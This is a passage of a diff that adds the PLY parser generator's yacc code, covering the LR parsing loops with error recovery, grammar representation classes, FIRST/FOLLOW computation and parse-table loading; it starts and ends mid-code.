'endlexpos', t1.lexpos) + #--! TRACKING + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # below as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + del symstack[-plen:] + self.state = state + p.callable(pslice) + del statestack[-plen:] + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + symstack.extend(targ[1:-1]) # Put the production slice back on the stack + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + else: + + #--! TRACKING + if tracking: + sym.lineno = lexer.lineno + sym.lexpos = lexer.lexpos + #--! 
TRACKING + + targ = [sym] + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # above as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + self.state = state + p.callable(pslice) + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + if t == 0: + n = symstack[-1] + result = getattr(n, 'value', None) + return result + + if t is None: + + + # We have some kind of parsing error here. To handle + # this, we are going to push the current token onto + # the tokenstack and replace it with an 'error' token. + # If there are any synchronization rules, they may + # catch it. + # + # In addition to pushing the error token, we call call + # the user defined p_error() function if this is the + # first syntax error. This function is only called if + # errorcount == 0. + if errorcount == 0 or self.errorok: + errorcount = error_count + self.errorok = False + errtoken = lookahead + if errtoken.type == '$end': + errtoken = None # End of file! + if self.errorfunc: + if errtoken and not hasattr(errtoken, 'lexer'): + errtoken.lexer = lexer + self.state = state + tok = call_errorfunc(self.errorfunc, errtoken, self) + if self.errorok: + # User must have done some kind of panic + # mode recovery on their own. The + # returned token is the next lookahead + lookahead = tok + errtoken = None + continue + else: + if errtoken: + if hasattr(errtoken, 'lineno'): + lineno = lookahead.lineno + else: + lineno = 0 + if lineno: + sys.stderr.write('yacc: Syntax error at line %d, token=%s\n' % (lineno, errtoken.type)) + else: + sys.stderr.write('yacc: Syntax error, token=%s' % errtoken.type) + else: + sys.stderr.write('yacc: Parse error in input. EOF\n') + return + + else: + errorcount = error_count + + # case 1: the statestack only has 1 entry on it. If we're in this state, the + # entire parse has been rolled back and we're completely hosed. The token is + # discarded and we just keep going. + + if len(statestack) <= 1 and lookahead.type != '$end': + lookahead = None + errtoken = None + state = 0 + # Nuke the pushback stack + del lookaheadstack[:] + continue + + # case 2: the statestack has a couple of entries on it, but we're + # at the end of the file. nuke the top entry and generate an error token + + # Start nuking entries on the stack + if lookahead.type == '$end': + # Whoa. We're really hosed here. Bail out + return + + if lookahead.type != 'error': + sym = symstack[-1] + if sym.type == 'error': + # Hmmm. Error is on top of stack, we'll just nuke input + # symbol and continue + #--! TRACKING + if tracking: + sym.endlineno = getattr(lookahead, 'lineno', sym.lineno) + sym.endlexpos = getattr(lookahead, 'lexpos', sym.lexpos) + #--! 
TRACKING + lookahead = None + continue + + # Create the error symbol for the first time and make it the new lookahead symbol + t = YaccSymbol() + t.type = 'error' + + if hasattr(lookahead, 'lineno'): + t.lineno = t.endlineno = lookahead.lineno + if hasattr(lookahead, 'lexpos'): + t.lexpos = t.endlexpos = lookahead.lexpos + t.value = lookahead + lookaheadstack.append(lookahead) + lookahead = t + else: + sym = symstack.pop() + #--! TRACKING + if tracking: + lookahead.lineno = sym.lineno + lookahead.lexpos = sym.lexpos + #--! TRACKING + statestack.pop() + state = statestack[-1] + + continue + + # Call an error function here + raise RuntimeError('yacc: internal parser error!!!\n') + + #--! parseopt-end + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # parseopt_notrack(). + # + # Optimized version of parseopt() with line number tracking removed. + # DO NOT EDIT THIS CODE DIRECTLY. This code is automatically generated + # by the ply/ygen.py script. Make changes to the parsedebug() method instead. + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + def parseopt_notrack(self, input=None, lexer=None, debug=False, tracking=False, tokenfunc=None): + #--! parseopt-notrack-start + lookahead = None # Current lookahead symbol + lookaheadstack = [] # Stack of lookahead symbols + actions = self.action # Local reference to action table (to avoid lookup on self.) + goto = self.goto # Local reference to goto table (to avoid lookup on self.) + prod = self.productions # Local reference to production list (to avoid lookup on self.) + defaulted_states = self.defaulted_states # Local reference to defaulted states + pslice = YaccProduction(None) # Production object passed to grammar rules + errorcount = 0 # Used during error recovery + + + # If no lexer was given, we will try to use the lex module + if not lexer: + from . import lex + lexer = lex.lexer + + # Set up the lexer and parser objects on pslice + pslice.lexer = lexer + pslice.parser = self + + # If input was supplied, pass to lexer + if input is not None: + lexer.input(input) + + if tokenfunc is None: + # Tokenize function + get_token = lexer.token + else: + get_token = tokenfunc + + # Set the parser() token method (sometimes used in error recovery) + self.token = get_token + + # Set up the state and symbol stacks + + statestack = [] # Stack of parsing states + self.statestack = statestack + symstack = [] # Stack of grammar symbols + self.symstack = symstack + + pslice.stack = symstack # Put in the production + errtoken = None # Err token + + # The start state is assumed to be (0,$end) + + statestack.append(0) + sym = YaccSymbol() + sym.type = '$end' + symstack.append(sym) + state = 0 + while True: + # Get the next symbol on the input. If a lookahead symbol + # is already set, we just use that. 
Otherwise, we'll pull + # the next token off of the lookaheadstack or from the lexer + + + if state not in defaulted_states: + if not lookahead: + if not lookaheadstack: + lookahead = get_token() # Get the next token + else: + lookahead = lookaheadstack.pop() + if not lookahead: + lookahead = YaccSymbol() + lookahead.type = '$end' + + # Check the action table + ltype = lookahead.type + t = actions[state].get(ltype) + else: + t = defaulted_states[state] + + + if t is not None: + if t > 0: + # shift a symbol on the stack + statestack.append(t) + state = t + + + symstack.append(lookahead) + lookahead = None + + # Decrease error count on successful shift + if errorcount: + errorcount -= 1 + continue + + if t < 0: + # reduce a symbol on the stack, emit a production + p = prod[-t] + pname = p.name + plen = p.len + + # Get production function + sym = YaccSymbol() + sym.type = pname # Production name + sym.value = None + + + if plen: + targ = symstack[-plen-1:] + targ[0] = sym + + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # below as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + del symstack[-plen:] + self.state = state + p.callable(pslice) + del statestack[-plen:] + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + symstack.extend(targ[1:-1]) # Put the production slice back on the stack + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + else: + + + targ = [sym] + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # above as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + self.state = state + p.callable(pslice) + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + if t == 0: + n = symstack[-1] + result = getattr(n, 'value', None) + return result + + if t is None: + + + # We have some kind of parsing error here. To handle + # this, we are going to push the current token onto + # the tokenstack and replace it with an 'error' token. + # If there are any synchronization rules, they may + # catch it. + # + # In addition to pushing the error token, we call call + # the user defined p_error() function if this is the + # first syntax error. This function is only called if + # errorcount == 0. + if errorcount == 0 or self.errorok: + errorcount = error_count + self.errorok = False + errtoken = lookahead + if errtoken.type == '$end': + errtoken = None # End of file! 
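+                    # self.errorfunc is the user's p_error() handler.  A
+                    # minimal sketch of such a handler (illustrative only,
+                    # not defined anywhere in this file):
+                    #
+                    #     def p_error(tok):
+                    #         if tok is None:
+                    #             print('Syntax error at EOF')
+                    #         else:
+                    #             print('Syntax error at token', tok.type)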
+ if self.errorfunc: + if errtoken and not hasattr(errtoken, 'lexer'): + errtoken.lexer = lexer + self.state = state + tok = call_errorfunc(self.errorfunc, errtoken, self) + if self.errorok: + # User must have done some kind of panic + # mode recovery on their own. The + # returned token is the next lookahead + lookahead = tok + errtoken = None + continue + else: + if errtoken: + if hasattr(errtoken, 'lineno'): + lineno = lookahead.lineno + else: + lineno = 0 + if lineno: + sys.stderr.write('yacc: Syntax error at line %d, token=%s\n' % (lineno, errtoken.type)) + else: + sys.stderr.write('yacc: Syntax error, token=%s' % errtoken.type) + else: + sys.stderr.write('yacc: Parse error in input. EOF\n') + return + + else: + errorcount = error_count + + # case 1: the statestack only has 1 entry on it. If we're in this state, the + # entire parse has been rolled back and we're completely hosed. The token is + # discarded and we just keep going. + + if len(statestack) <= 1 and lookahead.type != '$end': + lookahead = None + errtoken = None + state = 0 + # Nuke the pushback stack + del lookaheadstack[:] + continue + + # case 2: the statestack has a couple of entries on it, but we're + # at the end of the file. nuke the top entry and generate an error token + + # Start nuking entries on the stack + if lookahead.type == '$end': + # Whoa. We're really hosed here. Bail out + return + + if lookahead.type != 'error': + sym = symstack[-1] + if sym.type == 'error': + # Hmmm. Error is on top of stack, we'll just nuke input + # symbol and continue + lookahead = None + continue + + # Create the error symbol for the first time and make it the new lookahead symbol + t = YaccSymbol() + t.type = 'error' + + if hasattr(lookahead, 'lineno'): + t.lineno = t.endlineno = lookahead.lineno + if hasattr(lookahead, 'lexpos'): + t.lexpos = t.endlexpos = lookahead.lexpos + t.value = lookahead + lookaheadstack.append(lookahead) + lookahead = t + else: + sym = symstack.pop() + statestack.pop() + state = statestack[-1] + + continue + + # Call an error function here + raise RuntimeError('yacc: internal parser error!!!\n') + + #--! parseopt-notrack-end + +# ----------------------------------------------------------------------------- +# === Grammar Representation === +# +# The following functions, classes, and variables are used to represent and +# manipulate the rules that make up a grammar. +# ----------------------------------------------------------------------------- + +# regex matching identifiers +_is_identifier = re.compile(r'^[a-zA-Z0-9_-]+$') + +# ----------------------------------------------------------------------------- +# class Production: +# +# This class stores the raw information about a single production or grammar rule. +# A grammar rule refers to a specification such as this: +# +# expr : expr PLUS term +# +# Here are the basic attributes defined on all productions +# +# name - Name of the production. For example 'expr' +# prod - A list of symbols on the right side ['expr','PLUS','term'] +# prec - Production precedence level +# number - Production number. +# func - Function that executes on reduce +# file - File where production function is defined +# lineno - Line number where production function is defined +# +# The following attributes are defined or optional. 
+# +# len - Length of the production (number of symbols on right hand side) +# usyms - Set of unique symbols found in the production +# ----------------------------------------------------------------------------- + +class Production(object): + reduced = 0 + def __init__(self, number, name, prod, precedence=('right', 0), func=None, file='', line=0): + self.name = name + self.prod = tuple(prod) + self.number = number + self.func = func + self.callable = None + self.file = file + self.line = line + self.prec = precedence + + # Internal settings used during table construction + + self.len = len(self.prod) # Length of the production + + # Create a list of unique production symbols used in the production + self.usyms = [] + for s in self.prod: + if s not in self.usyms: + self.usyms.append(s) + + # List of all LR items for the production + self.lr_items = [] + self.lr_next = None + + # Create a string representation + if self.prod: + self.str = '%s -> %s' % (self.name, ' '.join(self.prod)) + else: + self.str = '%s -> ' % self.name + + def __str__(self): + return self.str + + def __repr__(self): + return 'Production(' + str(self) + ')' + + def __len__(self): + return len(self.prod) + + def __nonzero__(self): + return 1 + + def __getitem__(self, index): + return self.prod[index] + + # Return the nth lr_item from the production (or None if at the end) + def lr_item(self, n): + if n > len(self.prod): + return None + p = LRItem(self, n) + # Precompute the list of productions immediately following. + try: + p.lr_after = Prodnames[p.prod[n+1]] + except (IndexError, KeyError): + p.lr_after = [] + try: + p.lr_before = p.prod[n-1] + except IndexError: + p.lr_before = None + return p + + # Bind the production function name to a callable + def bind(self, pdict): + if self.func: + self.callable = pdict[self.func] + +# This class serves as a minimal standin for Production objects when +# reading table data from files. It only contains information +# actually used by the LR parsing engine, plus some additional +# debugging information. +class MiniProduction(object): + def __init__(self, str, name, len, func, file, line): + self.name = name + self.len = len + self.func = func + self.callable = None + self.file = file + self.line = line + self.str = str + + def __str__(self): + return self.str + + def __repr__(self): + return 'MiniProduction(%s)' % self.str + + # Bind the production function name to a callable + def bind(self, pdict): + if self.func: + self.callable = pdict[self.func] + + +# ----------------------------------------------------------------------------- +# class LRItem +# +# This class represents a specific stage of parsing a production rule. For +# example: +# +# expr : expr . PLUS term +# +# In the above, the "." represents the current location of the parse. Here +# basic attributes: +# +# name - Name of the production. For example 'expr' +# prod - A list of symbols on the right side ['expr','.', 'PLUS','term'] +# number - Production number. +# +# lr_next Next LR item. Example, if we are ' expr -> expr . PLUS term' +# then lr_next refers to 'expr -> expr PLUS . term' +# lr_index - LR item index (location of the ".") in the prod list. 
+# lookaheads - LALR lookahead symbols for this item +# len - Length of the production (number of symbols on right hand side) +# lr_after - List of all productions that immediately follow +# lr_before - Grammar symbol immediately before +# ----------------------------------------------------------------------------- + +class LRItem(object): + def __init__(self, p, n): + self.name = p.name + self.prod = list(p.prod) + self.number = p.number + self.lr_index = n + self.lookaheads = {} + self.prod.insert(n, '.') + self.prod = tuple(self.prod) + self.len = len(self.prod) + self.usyms = p.usyms + + def __str__(self): + if self.prod: + s = '%s -> %s' % (self.name, ' '.join(self.prod)) + else: + s = '%s -> ' % self.name + return s + + def __repr__(self): + return 'LRItem(' + str(self) + ')' + +# ----------------------------------------------------------------------------- +# rightmost_terminal() +# +# Return the rightmost terminal from a list of symbols. Used in add_production() +# ----------------------------------------------------------------------------- +def rightmost_terminal(symbols, terminals): + i = len(symbols) - 1 + while i >= 0: + if symbols[i] in terminals: + return symbols[i] + i -= 1 + return None + +# ----------------------------------------------------------------------------- +# === GRAMMAR CLASS === +# +# The following class represents the contents of the specified grammar along +# with various computed properties such as first sets, follow sets, LR items, etc. +# This data is used for critical parts of the table generation process later. +# ----------------------------------------------------------------------------- + +class GrammarError(YaccError): + pass + +class Grammar(object): + def __init__(self, terminals): + self.Productions = [None] # A list of all of the productions. The first + # entry is always reserved for the purpose of + # building an augmented grammar + + self.Prodnames = {} # A dictionary mapping the names of nonterminals to a list of all + # productions of that nonterminal. + + self.Prodmap = {} # A dictionary that is only used to detect duplicate + # productions. + + self.Terminals = {} # A dictionary mapping the names of terminal symbols to a + # list of the rules where they are used. + + for term in terminals: + self.Terminals[term] = [] + + self.Terminals['error'] = [] + + self.Nonterminals = {} # A dictionary mapping names of nonterminals to a list + # of rule numbers where they are used. + + self.First = {} # A dictionary of precomputed FIRST(x) symbols + + self.Follow = {} # A dictionary of precomputed FOLLOW(x) symbols + + self.Precedence = {} # Precedence rules for each terminal. Contains tuples of the + # form ('right',level) or ('nonassoc', level) or ('left',level) + + self.UsedPrecedence = set() # Precedence rules that were actually used by the grammer. + # This is only used to provide error checking and to generate + # a warning about unused precedence rules. + + self.Start = None # Starting symbol for the grammar + + + def __len__(self): + return len(self.Productions) + + def __getitem__(self, index): + return self.Productions[index] + + # ----------------------------------------------------------------------------- + # set_precedence() + # + # Sets the precedence for a given terminal. assoc is the associativity such as + # 'left','right', or 'nonassoc'. level is a numeric level. 
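+    # For example (sketch): g.set_precedence('PLUS', 'left', 1) followed by
+    # g.set_precedence('TIMES', 'left', 2) gives TIMES a higher binding
+    # level than PLUS.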
+ # + # ----------------------------------------------------------------------------- + + def set_precedence(self, term, assoc, level): + assert self.Productions == [None], 'Must call set_precedence() before add_production()' + if term in self.Precedence: + raise GrammarError('Precedence already specified for terminal %r' % term) + if assoc not in ['left', 'right', 'nonassoc']: + raise GrammarError("Associativity must be one of 'left','right', or 'nonassoc'") + self.Precedence[term] = (assoc, level) + + # ----------------------------------------------------------------------------- + # add_production() + # + # Given an action function, this function assembles a production rule and + # computes its precedence level. + # + # The production rule is supplied as a list of symbols. For example, + # a rule such as 'expr : expr PLUS term' has a production name of 'expr' and + # symbols ['expr','PLUS','term']. + # + # Precedence is determined by the precedence of the right-most non-terminal + # or the precedence of a terminal specified by %prec. + # + # A variety of error checks are performed to make sure production symbols + # are valid and that %prec is used correctly. + # ----------------------------------------------------------------------------- + + def add_production(self, prodname, syms, func=None, file='', line=0): + + if prodname in self.Terminals: + raise GrammarError('%s:%d: Illegal rule name %r. Already defined as a token' % (file, line, prodname)) + if prodname == 'error': + raise GrammarError('%s:%d: Illegal rule name %r. error is a reserved word' % (file, line, prodname)) + if not _is_identifier.match(prodname): + raise GrammarError('%s:%d: Illegal rule name %r' % (file, line, prodname)) + + # Look for literal tokens + for n, s in enumerate(syms): + if s[0] in "'\"": + try: + c = eval(s) + if (len(c) > 1): + raise GrammarError('%s:%d: Literal token %s in rule %r may only be a single character' % + (file, line, s, prodname)) + if c not in self.Terminals: + self.Terminals[c] = [] + syms[n] = c + continue + except SyntaxError: + pass + if not _is_identifier.match(s) and s != '%prec': + raise GrammarError('%s:%d: Illegal name %r in rule %r' % (file, line, s, prodname)) + + # Determine the precedence level + if '%prec' in syms: + if syms[-1] == '%prec': + raise GrammarError('%s:%d: Syntax error. Nothing follows %%prec' % (file, line)) + if syms[-2] != '%prec': + raise GrammarError('%s:%d: Syntax error. %%prec can only appear at the end of a grammar rule' % + (file, line)) + precname = syms[-1] + prodprec = self.Precedence.get(precname) + if not prodprec: + raise GrammarError('%s:%d: Nothing known about the precedence of %r' % (file, line, precname)) + else: + self.UsedPrecedence.add(precname) + del syms[-2:] # Drop %prec from the rule + else: + # If no %prec, precedence is determined by the rightmost terminal symbol + precname = rightmost_terminal(syms, self.Terminals) + prodprec = self.Precedence.get(precname, ('right', 0)) + + # See if the rule is already in the rulemap + map = '%s -> %s' % (prodname, syms) + if map in self.Prodmap: + m = self.Prodmap[map] + raise GrammarError('%s:%d: Duplicate rule %s. ' % (file, line, m) + + 'Previous definition at %s:%d' % (m.file, m.line)) + + # From this point on, everything is valid. 
Create a new Production instance + pnumber = len(self.Productions) + if prodname not in self.Nonterminals: + self.Nonterminals[prodname] = [] + + # Add the production number to Terminals and Nonterminals + for t in syms: + if t in self.Terminals: + self.Terminals[t].append(pnumber) + else: + if t not in self.Nonterminals: + self.Nonterminals[t] = [] + self.Nonterminals[t].append(pnumber) + + # Create a production and add it to the list of productions + p = Production(pnumber, prodname, syms, prodprec, func, file, line) + self.Productions.append(p) + self.Prodmap[map] = p + + # Add to the global productions list + try: + self.Prodnames[prodname].append(p) + except KeyError: + self.Prodnames[prodname] = [p] + + # ----------------------------------------------------------------------------- + # set_start() + # + # Sets the starting symbol and creates the augmented grammar. Production + # rule 0 is S' -> start where start is the start symbol. + # ----------------------------------------------------------------------------- + + def set_start(self, start=None): + if not start: + start = self.Productions[1].name + if start not in self.Nonterminals: + raise GrammarError('start symbol %s undefined' % start) + self.Productions[0] = Production(0, "S'", [start]) + self.Nonterminals[start].append(0) + self.Start = start + + # ----------------------------------------------------------------------------- + # find_unreachable() + # + # Find all of the nonterminal symbols that can't be reached from the starting + # symbol. Returns a list of nonterminals that can't be reached. + # ----------------------------------------------------------------------------- + + def find_unreachable(self): + + # Mark all symbols that are reachable from a symbol s + def mark_reachable_from(s): + if s in reachable: + return + reachable.add(s) + for p in self.Prodnames.get(s, []): + for r in p.prod: + mark_reachable_from(r) + + reachable = set() + mark_reachable_from(self.Productions[0].prod[0]) + return [s for s in self.Nonterminals if s not in reachable] + + # ----------------------------------------------------------------------------- + # infinite_cycles() + # + # This function looks at the various parsing rules and tries to detect + # infinite recursion cycles (grammar rules where there is no possible way + # to derive a string of only terminals). + # ----------------------------------------------------------------------------- + + def infinite_cycles(self): + terminates = {} + + # Terminals: + for t in self.Terminals: + terminates[t] = True + + terminates['$end'] = True + + # Nonterminals: + + # Initialize to false: + for n in self.Nonterminals: + terminates[n] = False + + # Then propagate termination until no change: + while True: + some_change = False + for (n, pl) in self.Prodnames.items(): + # Nonterminal n terminates iff any of its productions terminates. + for p in pl: + # Production p terminates iff all of its rhs symbols terminate. + for s in p.prod: + if not terminates[s]: + # The symbol s does not terminate, + # so production p does not terminate. + p_terminates = False + break + else: + # didn't break from the loop, + # so every symbol s terminates + # so production p terminates. + p_terminates = True + + if p_terminates: + # symbol n terminates! + if not terminates[n]: + terminates[n] = True + some_change = True + # Don't need to consider any more productions for this n. 
+                        break
+
+            if not some_change:
+                break
+
+        infinite = []
+        for (s, term) in terminates.items():
+            if not term:
+                if s not in self.Prodnames and s not in self.Terminals and s != 'error':
+                    # s is used-but-not-defined, and we've already warned of that,
+                    # so it would be overkill to say that it's also non-terminating.
+                    pass
+                else:
+                    infinite.append(s)
+
+        return infinite
+
+    # -----------------------------------------------------------------------------
+    # undefined_symbols()
+    #
+    # Find all symbols that were used in the grammar, but not defined as tokens or
+    # grammar rules.  Returns a list of tuples (sym, prod) where sym is the symbol
+    # and prod is the production where the symbol was used.
+    # -----------------------------------------------------------------------------
+    def undefined_symbols(self):
+        result = []
+        for p in self.Productions:
+            if not p:
+                continue
+
+            for s in p.prod:
+                if s not in self.Prodnames and s not in self.Terminals and s != 'error':
+                    result.append((s, p))
+        return result
+
+    # -----------------------------------------------------------------------------
+    # unused_terminals()
+    #
+    # Find all terminals that were defined, but not used by the grammar.  Returns
+    # a list of all such symbols.
+    # -----------------------------------------------------------------------------
+    def unused_terminals(self):
+        unused_tok = []
+        for s, v in self.Terminals.items():
+            if s != 'error' and not v:
+                unused_tok.append(s)
+
+        return unused_tok
+
+    # ------------------------------------------------------------------------------
+    # unused_rules()
+    #
+    # Find all grammar rules that were defined, but never used (possibly unreachable).
+    # Returns a list of productions.
+    # ------------------------------------------------------------------------------
+
+    def unused_rules(self):
+        unused_prod = []
+        for s, v in self.Nonterminals.items():
+            if not v:
+                p = self.Prodnames[s][0]
+                unused_prod.append(p)
+        return unused_prod
+
+    # -----------------------------------------------------------------------------
+    # unused_precedence()
+    #
+    # Returns a list of tuples (term, precedence) corresponding to precedence
+    # rules that were never used by the grammar.  term is the name of the terminal
+    # on which precedence was applied and precedence is a string such as 'left' or
+    # 'right' corresponding to the type of precedence.
+    # -----------------------------------------------------------------------------
+
+    def unused_precedence(self):
+        unused = []
+        for termname in self.Precedence:
+            if not (termname in self.Terminals or termname in self.UsedPrecedence):
+                unused.append((termname, self.Precedence[termname][0]))
+
+        return unused
+
+    # -------------------------------------------------------------------------
+    # _first()
+    #
+    # Compute the value of FIRST1(beta) where beta is a tuple of symbols.
+    #
+    # During execution of compute_first(), the result may be incomplete.
+    # Afterward (e.g., when called from compute_follow()), it will be complete.
+    # -------------------------------------------------------------------------
+    def _first(self, beta):
+
+        # We are computing First(x1,x2,x3,...,xn)
+        result = []
+        for x in beta:
+            x_produces_empty = False
+
+            # Add all the non-empty symbols of First[x] to the result.
+            for f in self.First[x]:
+                if f == '':
+                    x_produces_empty = True
+                else:
+                    if f not in result:
+                        result.append(f)
+
+            if x_produces_empty:
+                # We have to consider the next x in beta,
+                # i.e. stay in the loop.
+                pass
+            else:
+                # We don't have to consider any further symbols in beta.
+ break + else: + # There was no 'break' from the loop, + # so x_produces_empty was true for all x in beta, + # so beta produces empty as well. + result.append('') + + return result + + # ------------------------------------------------------------------------- + # compute_first() + # + # Compute the value of FIRST1(X) for all symbols + # ------------------------------------------------------------------------- + def compute_first(self): + if self.First: + return self.First + + # Terminals: + for t in self.Terminals: + self.First[t] = [t] + + self.First['$end'] = ['$end'] + + # Nonterminals: + + # Initialize to the empty set: + for n in self.Nonterminals: + self.First[n] = [] + + # Then propagate symbols until no change: + while True: + some_change = False + for n in self.Nonterminals: + for p in self.Prodnames[n]: + for f in self._first(p.prod): + if f not in self.First[n]: + self.First[n].append(f) + some_change = True + if not some_change: + break + + return self.First + + # --------------------------------------------------------------------- + # compute_follow() + # + # Computes all of the follow sets for every non-terminal symbol. The + # follow set is the set of all symbols that might follow a given + # non-terminal. See the Dragon book, 2nd Ed. p. 189. + # --------------------------------------------------------------------- + def compute_follow(self, start=None): + # If already computed, return the result + if self.Follow: + return self.Follow + + # If first sets not computed yet, do that first. + if not self.First: + self.compute_first() + + # Add '$end' to the follow list of the start symbol + for k in self.Nonterminals: + self.Follow[k] = [] + + if not start: + start = self.Productions[1].name + + self.Follow[start] = ['$end'] + + while True: + didadd = False + for p in self.Productions[1:]: + # Here is the production set + for i, B in enumerate(p.prod): + if B in self.Nonterminals: + # Okay. We got a non-terminal in a production + fst = self._first(p.prod[i+1:]) + hasempty = False + for f in fst: + if f != '' and f not in self.Follow[B]: + self.Follow[B].append(f) + didadd = True + if f == '': + hasempty = True + if hasempty or i == (len(p.prod)-1): + # Add elements of follow(a) to follow(b) + for f in self.Follow[p.name]: + if f not in self.Follow[B]: + self.Follow[B].append(f) + didadd = True + if not didadd: + break + return self.Follow + + + # ----------------------------------------------------------------------------- + # build_lritems() + # + # This function walks the list of productions and builds a complete set of the + # LR items. The LR items are stored in two ways: First, they are uniquely + # numbered and placed in the list _lritems. Second, a linked list of LR items + # is built for each production. For example: + # + # E -> E PLUS E + # + # Creates the list + # + # [E -> . E PLUS E, E -> E . PLUS E, E -> E PLUS . E, E -> E PLUS E . 
] + # ----------------------------------------------------------------------------- + + def build_lritems(self): + for p in self.Productions: + lastlri = p + i = 0 + lr_items = [] + while True: + if i > len(p): + lri = None + else: + lri = LRItem(p, i) + # Precompute the list of productions immediately following + try: + lri.lr_after = self.Prodnames[lri.prod[i+1]] + except (IndexError, KeyError): + lri.lr_after = [] + try: + lri.lr_before = lri.prod[i-1] + except IndexError: + lri.lr_before = None + + lastlri.lr_next = lri + if not lri: + break + lr_items.append(lri) + lastlri = lri + i += 1 + p.lr_items = lr_items + +# ----------------------------------------------------------------------------- +# == Class LRTable == +# +# This basic class represents a basic table of LR parsing information. +# Methods for generating the tables are not defined here. They are defined +# in the derived class LRGeneratedTable. +# ----------------------------------------------------------------------------- + +class VersionError(YaccError): + pass + +class LRTable(object): + def __init__(self): + self.lr_action = None + self.lr_goto = None + self.lr_productions = None + self.lr_method = None + + def read_table(self, module): + if isinstance(module, types.ModuleType): + parsetab = module + else: + exec('import %s' % module) + parsetab = sys.modules[module] + + if parsetab._tabversion != __tabversion__: + raise VersionError('yacc table file version is out of date') + + self.lr_action = parsetab._lr_action + self.lr_goto = parsetab._lr_goto + + self.lr_productions = [] + for p in parsetab._lr_productions: + self.lr_productions.append(MiniProduction(*p)) + + self.lr_method = parsetab._lr_method + return parsetab._lr_signature + + def read_pickle(self, filename): + try: + import cPickle as pickle + except ImportError: + import pickle + + if not os.path.exists(filename): + raise ImportError + + in_f = open(filename, 'rb') + + tabversion = pickle.load(in_f) + if tabversion != __tabversion__: + raise VersionError('yacc table file version is out of date') + self.lr_method = pickle.load(in_f) + signature = pickle.load(in_f) + self.lr_action = pickle.load(in_f) + self.lr_goto = pickle.load(in_f) + productions = pickle.load(in_f) + + self.lr_productions = [] + for p in productions: + self.lr_productions.append(MiniProduction(*p)) + + in_f.close() + return signature + + # Bind all production function names to callable objects in pdict + def bind_callables(self, pdict): + for p in self.lr_productions: + p.bind(pdict) + + +# ----------------------------------------------------------------------------- +# === LR Generator === +# +# The following classes and functions are used to generate LR parsing tables on +# a grammar. +# ----------------------------------------------------------------------------- + +# ----------------------------------------------------------------------------- +# digraph() +# traverse() +# +# The following two functions are used to compute set valued functions +# of the form: +# +# F(x) = F'(x) U U{F(y) | x R y} +# +# This is used to compute the values of Read() sets as well as FOLLOW sets +# in LALR(1) generation. 
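+#
+# Here F'(x) is the directly computed part of the answer and the relation R
+# says which other values must be folded in.  A tiny self-contained
+# illustration (hypothetical inputs, not part of this module's API):
+#
+#     X  = ['a', 'b']
+#     R  = lambda x: ['b'] if x == 'a' else []
+#     FP = lambda x: [x.upper()]
+#     digraph(X, R, FP)    # returns {'a': ['A', 'B'], 'b': ['B']}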
+#
+# Inputs:  X  - An input set
+#          R  - A relation
+#          FP - Set-valued function
+# ------------------------------------------------------------------------------
+
+def digraph(X, R, FP):
+    N = {}
+    for x in X:
+        N[x] = 0
+    stack = []
+    F = {}
+    for x in X:
+        if N[x] == 0:
+            traverse(x, N, stack, F, X, R, FP)
+    return F
+
+def traverse(x, N, stack, F, X, R, FP):
+    stack.append(x)
+    d = len(stack)
+    N[x] = d
+    F[x] = FP(x)    # F(X) <- F'(x)
+
+    rel = R(x)      # Get y's related to x
+    for y in rel:
+        if N[y] == 0:
+            traverse(y, N, stack, F, X, R, FP)
+        N[x] = min(N[x], N[y])
+        for a in F.get(y, []):
+            if a not in F[x]:
+                F[x].append(a)
+    if N[x] == d:
+        N[stack[-1]] = MAXINT
+        F[stack[-1]] = F[x]
+        element = stack.pop()
+        while element != x:
+            N[stack[-1]] = MAXINT
